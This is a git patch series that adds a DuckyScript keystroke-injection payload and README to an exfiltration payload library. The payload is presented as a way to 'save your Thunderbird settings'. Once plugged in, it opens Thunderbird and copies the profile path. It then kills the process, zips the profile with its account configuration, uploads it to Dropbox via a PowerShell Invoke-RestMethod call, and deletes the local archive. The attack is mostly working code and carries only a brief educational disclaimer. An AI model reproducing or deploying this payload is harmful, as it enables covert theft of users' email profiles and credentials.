From a6055bb32dfa7e1ff9bd0223686ba064313eb879 Mon Sep 17 00:00:00 2001 From: Aleff Date: Mon, 3 Jun 2024 14:12:06 +0200 Subject: [PATCH 1/4] Save Your Thunderbird Settings via Dropbox This payload is designed in order to make Thunderbird configuration extraction immediate so that you can work in speed. --- .../Save_Your_Thunderbird_Settings/README.md | 103 +++++++++++++++++ .../payload.txt | 105 ++++++++++++++++++ 2 files changed, 208 insertions(+) create mode 100644 payloads/library/exfiltration/Save_Your_Thunderbird_Settings/README.md create mode 100644 payloads/library/exfiltration/Save_Your_Thunderbird_Settings/payload.txt diff --git a/payloads/library/exfiltration/Save_Your_Thunderbird_Settings/README.md b/payloads/library/exfiltration/Save_Your_Thunderbird_Settings/README.md new file mode 100644 index 00000000..a5b924fe --- /dev/null +++ b/payloads/library/exfiltration/Save_Your_Thunderbird_Settings/README.md @@ -0,0 +1,103 @@ +# Save Your Thunderbird Settings via Dropbox + +Thunderbird version, build ID, user agent, host machine information (RAM, available space, GPU...), email account configuration and much more available through this juicy Thunderbird feature. + +This payload is designed in order to make Thunderbird configuration extraction immediate so that you can work in speed. It can be used, for istance, in case you have a lot of devices and want to quickly and manually save every single Thunderbird configuration. + +**Alert!** I have also uploaded my personal Dropbox token, please don't use it because I need it for my own stuff! + +**Category:** Exfiltration + +## Index + +- [Overview](#overview) +- [Requirements](#requirements) +- [Test Environment](#test-environment) +- [Configuration](#configuration) +- [Functionality](#functionality) + - [System Detection](#system-detection) + - [Opening Thunderbird](#opening-thunderbird) + - [Copying Profile Folder Path](#copying-profile-folder-path) + - [Opening PowerShell and Uploading to Dropbox](#opening-powershell-and-uploading-to-dropbox) +- [Notes](#notes) +- [Credits](#credits) + +## Overview + +This program automates the process of saving your Thunderbird settings to Dropbox. It is designed for Windows 10/11 systems and falls under the exfiltration category. The main functionality includes detecting the system state, opening Thunderbird, copying the profile folder path, compressing the profile folder, and uploading it to Dropbox. + +## Requirements + +- **Dropbox Access Token:** You need a valid Dropbox access token to upload the file. +- **PowerShell:** The script uses PowerShell to execute commands and interact with the filesystem. +- **Thunderbird:** In order to exfiltrate the Thunderbird configuration, it is essential to have Thunderbird configured...obvious right? And yet... + +## Test Environment + +- Thunderbird 115.11.1 (64 bit) +- Windows 10 Pro + +## Configuration + +Before running the program, ensure to set the following parameters (*except #DROPBOX_API_CONST that is a constant*) correctly/as you prefer: + +```plaintext +DEFINE #ACCESS_TOKEN aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj1Sdlk1cGxvbzFPSQ== +DEFINE #ARCHIVE_NAME cache.zip +DEFINE #DROPBOX_FOLDER_PATH / +DEFINE #DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload +``` +- `#ACCESS_TOKEN`: Your private Dropbox access token +- `#ARCHIVE_NAME`: The name of the archive file to be created (e.g., `cache.zip`). +- `#DROPBOX_FOLDER_PATH`: The path in your Dropbox where the file will be uploaded (e.g., `/`). + +## Functionality + +### System Detection + +The program starts by detecting whether the system reflects the CAPSLOCK state. This is used to set a dynamic boot delay. If CAPSLOCK is not reflected, a maximum delay of 3000ms is applied. + +### Opening Thunderbird + +The script then opens Thunderbird and navigates through the settings to locate the profile folder. This path is copied to the clipboard for further use. + +### Copying Profile Folder Path + +The copied path of the Thunderbird profile folder is used to compress the profile data into a ZIP file. + +### Opening PowerShell and Uploading to Dropbox + +Using PowerShell, the script performs the following actions: + +1. **Navigate to TEMP Directory:** Changes the directory to the temporary environment path. +2. **Stop Thunderbird Process:** Stops the Thunderbird process to ensure the profile data is not being used. +3. **Compress Profile Folder:** Compresses the profile folder into a ZIP file. +4. **Upload to Dropbox:** Uploads the ZIP file to the specified Dropbox folder using the Dropbox API. +5. **Cleanup:** Removes the local ZIP file after the upload is complete. + +## Notes + +- This program was created for educational and demonstrative purposes. Unauthorized access and exfiltration of data is illegal. +- Ensure you have the necessary permissions before running any script that modifies or transfers personal or sensitive data. + +## Credits + +

Aleff

+
+ + + + + +
+ + + +
Github + 		+ + + +
Linkedin +
+
\ No newline at end of file diff --git a/payloads/library/exfiltration/Save_Your_Thunderbird_Settings/payload.txt b/payloads/library/exfiltration/Save_Your_Thunderbird_Settings/payload.txt new file mode 100644 index 00000000..3b54e94b --- /dev/null +++ b/payloads/library/exfiltration/Save_Your_Thunderbird_Settings/payload.txt @@ -0,0 +1,105 @@ +REM ############################################################## +REM # # +REM # Title : Save Your Thunderbird Settings via Dropbox # +REM # Author : Aleff # +REM # Version : 1.0 # +REM # Category : Exfiltration # +REM # Target : Windows 10/11 # +REM # # +REM ############################################################## + +REM Required: Set here your Dropbox access TOKEN +DEFINE #ACCESS_TOKEN aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj1Sdlk1cGxvbzFPSQ== +DEFINE #ARCHIVE_NAME cache.zip +DEFINE #DROPBOX_FOLDER_PATH / +DEFINE #DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload + +EXTENSION DETECT_READY + REM VERSION 1.1 + REM AUTHOR: Korben + + REM_BLOCK DOCUMENTATION + USAGE: + Extension runs inline (here) + Place at beginning of payload (besides ATTACKMODE) to act as dynamic + boot delay + + TARGETS: + Any system that reflects CAPSLOCK will detect minimum required delay + Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms + END_REM + + REM CONFIGURATION: + DEFINE #RESPONSE_DELAY 25 + DEFINE #ITERATION_LIMIT 120 + + VAR $C = 0 + WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT)) + CAPSLOCK + DELAY #RESPONSE_DELAY + $C = ($C + 1) + END_WHILE + CAPSLOCK +END_EXTENSION + +WIN r +STRING thunderbird +ENTER +DELAY 1000 +REPEAT 4 TAB +DELAY 500 +ENTER +DELAY 500 +REPEAT 2 UPARROW +DELAY 500 +ENTER +DELAY 500 +REPEAT 3 UPARROW +DELAY 500 +ENTER +DELAY 500 + +REM Inside the settings +REPEAT 11 TAB +DELAY 500 +ENTER +DELAY 500 + +REM INSIDE THE PROFILE FOLDER +REPEAT 4 TAB +DELAY 500 +ENTER +DELAY 500 +CTRL c +DELAY 500 +ALT F4 +DELAY 500 +WIN R +STRING powershell +ENTER +DELAY 1500 + +STRINGLN cd $env:TEMP +DELAY 500 +STRINGLN Stop-Process -Name "thunderbird" -Force +DELAY 500 +STRING Compress-Archive -LiteralPath +DELAY 500 +CTRL v +DELAY 500 +STRINGLN -DestinationPath ./#ARCHIVE_NAME +DELAY 1000 + +STRINGLN + $filePath = "$env:TEMP/#ARCHIVE_NAME" + $filePath = $filePath -replace "\\", "/" + $dropboxPath = "#DROPBOX_FOLDER_PATH#ARCHIVE_NAME" + $accessToken = "#ACCESS_TOKEN" + $fileContent = [System.IO.File]::ReadAllBytes($filePath) + $headers = @{ + "Authorization" = "Bearer $accessToken" + "Dropbox-API-Arg" = ("{`"path`": `"" + $dropboxPath + "`", `"mode`": `"add`", `"autorename`": true, `"mute`": false}") + "Content-Type" = "application/octet-stream" + } + Invoke-RestMethod -Uri "https://content.dropboxapi.com/2/files/upload" -Method Post -Headers $headers -Body $fileContent; rm $filePath; exit +END_STRINGLN \ No newline at end of file From af74e3f8cdb1fbf9cf59b0b4e13f68b9d9015e61 Mon Sep 17 00:00:00 2001 From: Aleff Date: Tue, 4 Jun 2024 07:56:26 +0200 Subject: [PATCH 2/4] Update payload.txt --- .../payload.txt | 26 +++++++++---------- 1 file changed, 13 insertions(+), 13 deletions(-) diff --git a/payloads/library/exfiltration/Save_Your_Thunderbird_Settings/payload.txt b/payloads/library/exfiltration/Save_Your_Thunderbird_Settings/payload.txt index 3b54e94b..a939d157 100644 --- a/payloads/library/exfiltration/Save_Your_Thunderbird_Settings/payload.txt +++ b/payloads/library/exfiltration/Save_Your_Thunderbird_Settings/payload.txt @@ -42,7 +42,7 @@ EXTENSION DETECT_READY CAPSLOCK END_EXTENSION -WIN r +GUI r STRING thunderbird ENTER DELAY 1000 @@ -74,7 +74,7 @@ CTRL c DELAY 500 ALT F4 DELAY 500 -WIN R +GUI r STRING powershell ENTER DELAY 1500 @@ -91,15 +91,15 @@ STRINGLN -DestinationPath ./#ARCHIVE_NAME DELAY 1000 STRINGLN - $filePath = "$env:TEMP/#ARCHIVE_NAME" - $filePath = $filePath -replace "\\", "/" - $dropboxPath = "#DROPBOX_FOLDER_PATH#ARCHIVE_NAME" - $accessToken = "#ACCESS_TOKEN" - $fileContent = [System.IO.File]::ReadAllBytes($filePath) - $headers = @{ - "Authorization" = "Bearer $accessToken" - "Dropbox-API-Arg" = ("{`"path`": `"" + $dropboxPath + "`", `"mode`": `"add`", `"autorename`": true, `"mute`": false}") - "Content-Type" = "application/octet-stream" - } - Invoke-RestMethod -Uri "https://content.dropboxapi.com/2/files/upload" -Method Post -Headers $headers -Body $fileContent; rm $filePath; exit + $filePath = "$env:TEMP/#ARCHIVE_NAME" + $filePath = $filePath -replace "\\", "/" + $dropboxPath = "#DROPBOX_FOLDER_PATH#ARCHIVE_NAME" + $accessToken = "#ACCESS_TOKEN" + $fileContent = [System.IO.File]::ReadAllBytes($filePath) + $headers = @{ + "Authorization" = "Bearer $accessToken" + "Dropbox-API-Arg" = ("{`"path`": `"" + $dropboxPath + "`", `"mode`": `"add`", `"autorename`": true, `"mute`": false}") + "Content-Type" = "application/octet-stream" + } + Invoke-RestMethod -Uri "https://content.dropboxapi.com/2/files/upload" -Method Post -Headers $headers -Body $fileContent; rm $filePath; exit END_STRINGLN \ No newline at end of file From c45a151dd773f9d2cb040691e183d159dafb1d11 Mon Sep 17 00:00:00 2001 From: Aleff Date: Thu, 6 Jun 2024 10:04:12 +0200 Subject: [PATCH 3/4] [+] STRINGLN_POWERSHELL --- .../exfiltration/Save_Your_Thunderbird_Settings/payload.txt | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/payloads/library/exfiltration/Save_Your_Thunderbird_Settings/payload.txt b/payloads/library/exfiltration/Save_Your_Thunderbird_Settings/payload.txt index a939d157..09b5cab1 100644 --- a/payloads/library/exfiltration/Save_Your_Thunderbird_Settings/payload.txt +++ b/payloads/library/exfiltration/Save_Your_Thunderbird_Settings/payload.txt @@ -90,7 +90,7 @@ DELAY 500 STRINGLN -DestinationPath ./#ARCHIVE_NAME DELAY 1000 -STRINGLN +STRINGLN_POWERSHELL $filePath = "$env:TEMP/#ARCHIVE_NAME" $filePath = $filePath -replace "\\", "/" $dropboxPath = "#DROPBOX_FOLDER_PATH#ARCHIVE_NAME" @@ -102,4 +102,4 @@ STRINGLN "Content-Type" = "application/octet-stream" } Invoke-RestMethod -Uri "https://content.dropboxapi.com/2/files/upload" -Method Post -Headers $headers -Body $fileContent; rm $filePath; exit -END_STRINGLN \ No newline at end of file +END_STRINGLN From 63d74b38078bbcc83808b8589094ab7cb4789fd2 Mon Sep 17 00:00:00 2001 From: Aleff Date: Wed, 12 Jun 2024 07:27:51 +0200 Subject: [PATCH 4/4] Update payload.txt --- .../exfiltration/Save_Your_Thunderbird_Settings/payload.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/payloads/library/exfiltration/Save_Your_Thunderbird_Settings/payload.txt b/payloads/library/exfiltration/Save_Your_Thunderbird_Settings/payload.txt index 09b5cab1..2bd3168e 100644 --- a/payloads/library/exfiltration/Save_Your_Thunderbird_Settings/payload.txt +++ b/payloads/library/exfiltration/Save_Your_Thunderbird_Settings/payload.txt @@ -9,7 +9,7 @@ REM # # REM ############################################################## REM Required: Set here your Dropbox access TOKEN -DEFINE #ACCESS_TOKEN aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj1Sdlk1cGxvbzFPSQ== +DEFINE #ACCESS_TOKEN example-access-token DEFINE #ARCHIVE_NAME cache.zip DEFINE #DROPBOX_FOLDER_PATH / DEFINE #DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload